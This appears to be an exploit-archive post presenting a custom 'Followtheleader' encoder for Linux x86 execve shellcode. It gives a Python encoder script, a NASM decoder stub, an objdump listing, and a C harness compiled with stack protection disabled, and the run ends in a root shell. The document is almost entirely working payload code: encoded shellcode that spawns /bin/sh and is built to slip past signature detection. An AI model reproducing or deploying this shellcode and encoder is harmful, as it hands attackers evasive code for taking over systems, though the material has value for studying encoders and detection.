/* Followtheleader custom execve-shellcode Encoder/Decoder - Linux Intel/x86 Author: Konstantinos Alexiou */ ------------------------------------------------------------------------------------------------------------------ a)Python script. Encoder for shellcode (execve) ------------------------------------------------------------------------------------------------------------------ #!/usr/bin/python # Author:Konstantinos Alexiou # Encoding name: Followtheleader-encoder # Description: Custom execve-shellcode encoder based on a given byte which is used to encode the execve shellcode import random import sys shellcode =('\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80') total = len(sys.argv) if total != 2: print '!!Give the LEADER byte' print 'Script must run as: python xxx.py LEADER' print 'LEADER is any integer between 17-255' print 'e.g python Followtheleader.py 32' else: try: leader = int(sys.argv[1]) fb = int(hex(leader)[2:3],16) # Split the LEADER. If leader = AF -->fb=A sb = int(hex(leader)[3:],16) # Split the LEADER. If LEADER = AF -->sb=F encoded = ' ' encoded2 = ' ' encoded = '\\x' encoded += hex(leader)[2:] # FIRST byte the LEADER encoded2 = '0x' encoded2 += hex(leader)[2:] i=0 for x in bytearray(shellcode): # READ every Instruction as BYTE i +=1 hopcode = '%02x' %x # KEEP only the HEX value of opcode Dec_hopcode = int(hopcode, 16) # CALCULATE the DECIMAL value of opcode suplX = 255 - Dec_hopcode # CALCULATE the SUPPLEMENT rev_suplx = hex(suplX)[::-1] # REVERT the bytes of SUPPLEMENT (ae --> ea) subfs = fb-sb #----------------------------The Encoded byte ---------------------------------------------------- xxx = hex(int(abs(subfs)) + int(rev_suplx[0:2],16)) #------------------------------------------------------------------------------------------------- if len(xxx)>4: # Check if xxx > 0xff print 'Overflow encoding.Try again!!!.' sys.exit() elif xxx == '0x0': # Check if ZERO byte was encoded print 'A byte was Encoded as 0x00 .Try again!!!' sys.exit() encoded += '\\x' # Put \x first encoded += xxx[2:] # Put the xxx afterwards insertByte = hex(random.randint(1,255)) # Put a Random byte encoded += '\\x' encoded += insertByte[2:] i +=1 encoded2 += ',' encoded2 += xxx encoded2 += ',' encoded2 += '0x' encoded2 += insertByte[2:] print ' *************'; print ' LEADER BYTE :decimal(%d), HEX(0x%x)' %(int(sys.argv[1]),leader) print ' *************'; print 'Len of Shellcode: %02d' % i print '------------------------------------------------------------------------'; print ' 1. Style:= %s ' % encoded print '------------------------------------------------------------------------'; print ' 2. Style:= %s ' % encoded2 print '------------------------------------------------------------------------'; except: print "exiting..." --------------------------------------------------------------------------------------- Followtheleader Encoder test run : $ python Followtheleader-encoder.py 67 ************* LEADER BYTE :decimal(67), HEX(0x43) ************* Len of Shellcode: 50 ------------------------------------------------------------------------ 1. Style:= \x43\xed\x1d\xf4\x40\xfb\x6f\x7a\xa9\xe\xb6\xe\xbc\xc9\xe3\x7a\xaf\x7a\x78 \xe\xc5\xda\x76\x6a\x17\x1a\x4e\x68\x38\xc2\x99\xfb\x35\x68\x84\xd2\xb3\xcb\x7c\x68\x78 \xe2\x9a\xf5\xe9\x50\xc0\x24\x91\xf8\xfe ------------------------------------------------------------------------ 2. Style:= 0x43,0xed,0x1d,0xf4,0x40,0xfb,0x6f,0x7a,0xa9,0xe,0xb6,0xe,0xbc,0xc9,0xe3, 0x7a,0xaf,0x7a,0x78,0xe,0xc5,0xda,0x76,0x6a,0x17,0x1a,0x4e,0x68,0x38,0xc2,0x99,0xfb,0x35, 0x68,0x84,0xd2,0xb3,0xcb,0x7c,0x68,0x78,0xe2,0x9a,0xf5,0xe9,0x50,0xc0,0x24,0x91,0xf8,0xfe ------------------------------------------------------------------------ b) Decoder for the encoded shellcode (execve-stack) --------------------------------------------------------------------------------------- $ cat Followtheleader-decoder.nasm ; Filename: Followtheleader-decoder.nasm ; Author: Konstantinos Alexiou ; Description: Followtheleader custom insertion Encoder, Linux Intel/x86 global _start section .text _start: jmp short call_shellcode decoder: pop esi ; Address of EncodedShellcode to ESI lea edi, [esi] ; Load effective address of what is contained on EDI xor ecx, ecx ; Zero ECX mul ecx ; This instruction will cause both EAX and EDX to become zero xor ebp, ebp ; Zero the value on EBP mov dl, byte [esi] ; Put the LEADER byte to EDX (DL) ;(firstb - secondb) CALCULATION mov al, dl ; Copy the LEADER to EAX ;firstb extraction of LEADER shr dl, 4 ; Keep only the 4 high bits of LEADER to DL (if Leader=ac then DL=a) [firstb] ;secondb extraction of LEADER shl eax, 28 ; shift left 28 bits of EAX which contains the value of Leader on al shr eax, 28 ; shift right 28 of EAX (if EAX=0xc0000000 now EAX=0x0000000c) [secondb] sub dl, al ; (firstb - secondb) value stored to EDX (DL) jns decode_pr negative: ; Calculate the absolute value if negative not dl inc dl ;decode process decode_pr: xor eax, eax xor ebx, ebx xor ecx, ecx mov al, byte [esi+1+ebp] ; Put the encoded byte to EAX mov ecx, ebp ; EBP is used as a counter copy the value of EBP to ECX xor cl, 0x32 ; At the end of the shellcode EBP should point 50 in decimal 32 in hex je short EncodedShellcode ;rev_suplx Calculation mov cl, al ; Put the Encoded byte to EAX (xxx to EAX) sub cl, dl ; rev_suplx= xxx-(firstb - secondb) value stored to CL mov bl, cl ; Keep Backup of rev_suplx to BL mov al, cl ; Second backup of CL ;Revert the bytes on rev_suplx shr bl, 4 ; shift 4 bits right (if was bl=ec now bl=e) shl eax, 28 ; shift left 28 bits of EAX which contains the value of rev_supl on cl( if EAX was 0xec now EAX=0xc0000000) shr eax, 24 ; shift right 24 of EAX (if EAX=0xc0000000 now EAX=0x000000c0) add eax, ebx ; add the value on EBX to EAX (if EAX=0x000000c0 + BL=0xe, EAX=0x0000000ce) ;Supplement Calculation mov bl, 0xff ; Value of 0xff to BL sub bl, al ; Calculate the Supplement mov byte [edi], bl ; Put the decoded byte to the position of EDI inc edi ; EDI is a pointer to the position which the decoded bytes will be stored add ebp,0x2 ; The EBP is a counter values will be (2,4,6,..50) jmp short decode_pr ; Goto the decode process to decode the next bytes call_shellcode: call decoder EncodedShellcode: db 0x43,0xed,0x1d,0xf4,0x40,0xfb,0x6f,0x7a,0xa9,0xe,0xb6,0xe,0xbc,0xc9,0xe3,0x7a,0xaf,0x7a,0x78,0xe,0xc5,0xda,0x76,0x6a,0x17,0x1a,0x4e,0x68,0x38,0xc2,0x99,0xfb,0x35,0x68,0x84,0xd2,0xb3,0xcb,0x7c,0x68,0x78,0xe2,0x9a,0xf5,0xe9,0x50,0xc0,0x24,0x91,0xf8,0xfe --------------------------------------------------------------------------------------------------------------------------------------- $ objdump -d ./Followtheleader-decoder -M intel ./Followtheleader-decoder: file format elf32-i386 Disassembly of section .text: 08048060 <_start>: 8048060: eb 4e jmp 80480b0 08048062 : 8048062: 5e pop esi 8048063: 8d 3e lea edi,[esi] 8048065: 31 c9 xor ecx,ecx 8048067: f7 e1 mul ecx 8048069: 31 ed xor ebp,ebp 804806b: 8a 16 mov dl,BYTE PTR [esi] 804806d: 88 d0 mov al,dl 804806f: c0 ea 04 shr dl,0x4 8048072: c1 e0 1c shl eax,0x1c 8048075: c1 e8 1c shr eax,0x1c 8048078: 28 c2 sub dl,al 804807a: 79 04 jns 8048080 0804807c : 804807c: f6 d2 not dl 804807e: fe c2 inc dl 08048080 : 8048080: 31 c0 xor eax,eax 8048082: 31 db xor ebx,ebx 8048084: 31 c9 xor ecx,ecx 8048086: 8a 44 2e 01 mov al,BYTE PTR [esi+ebp*1+0x1] 804808a: 89 e9 mov ecx,ebp 804808c: 80 f1 32 xor cl,0x32 804808f: 74 24 je 80480b5 8048091: 88 c1 mov cl,al 8048093: 28 d1 sub cl,dl 8048095: 88 cb mov bl,cl 8048097: 88 c8 mov al,cl 8048099: c0 eb 04 shr bl,0x4 804809c: c1 e0 1c shl eax,0x1c 804809f: c1 e8 18 shr eax,0x18 80480a2: 01 d8 add eax,ebx 80480a4: b3 ff mov bl,0xff 80480a6: 28 c3 sub bl,al 80480a8: 88 1f mov BYTE PTR [edi],bl 80480aa: 47 inc edi 80480ab: 83 c5 02 add ebp,0x2 80480ae: eb d0 jmp 8048080 080480b0 : 80480b0: e8 ad ff ff ff call 8048062 080480b5 : 80480b5: 43 inc ebx 80480b6: ed in eax,dx 80480b7: 1d f4 40 fb 6f sbb eax,0x6ffb40f4 80480bc: 7a a9 jp 8048067 80480be: 0e push cs 80480bf: b6 0e mov dh,0xe 80480c1: bc c9 e3 7a af mov esp,0xaf7ae3c9 80480c6: 7a 78 jp 8048140 80480c8: 0e push cs 80480c9: c5 da 76 (bad) 80480cc: 6a 17 push 0x17 80480ce: 1a 4e 68 sbb cl,BYTE PTR [esi+0x68] 80480d1: 38 c2 cmp dl,al 80480d3: 99 cdq 80480d4: fb sti 80480d5: 35 68 84 d2 b3 xor eax,0xb3d28468 80480da: cb retf 80480db: 7c 68 jl 8048145 80480dd: 78 e2 js 80480c1 80480df: 9a f5 e9 50 c0 24 91 call 0x9124:0xc050e9f5 80480e6: f8 clc 80480e7: fe .byte 0xfe ------------------------------------------------------------------------------------------- $ cat shellcode.c #include #include unsigned char code[] =\ "\xeb\x4e\x5e\x8d\x3e\x31\xc9\xf7\xe1\x31\xed\x8a\x16\x88\xd0\xc0\xea\x04\xc1\xe0\x1c\xc1\xe8\x1c\x28\xc2\x79\x04\xf6\xd2\xfe\xc2\x31\xc0\x31\xdb\x31\xc9\x8a\x44\x2e\x01\x89\xe9\x80\xf1\x32\x74\x24\x88\xc1\x28\xd1\x88\xcb\x88\xc8\xc0\xeb\x04\xc1\xe0\x1c\xc1\xe8\x18\x01\xd8\xb3\xff\x28\xc3\x88\x1f\x47\x83\xc5\x02\xeb\xd0\xe8\xad\xff\xff\xff\x43\xed\x1d\xf4\x40\xfb\x6f\x7a\xa9\x0e\xb6\x0e\xbc\xc9\xe3\x7a\xaf\x7a\x78\x0e\xc5\xda\x76\x6a\x17\x1a\x4e\x68\x38\xc2\x99\xfb\x35\x68\x84\xd2\xb3\xcb\x7c\x68\x78\xe2\x9a\xf5\xe9\x50\xc0\x24\x91\xf8\xfe"; main() { printf("Shellcode Length: %d\n", strlen(code)); int (*ret)() = (int(*)())code; ret(); } ------------------------------------------------------------------------------------------- $ gcc -fno-stack-protector -z execstack shellcode.c -o shellcode $ ./shellcode Shellcode Length: 136 $whoami root $

Query Builder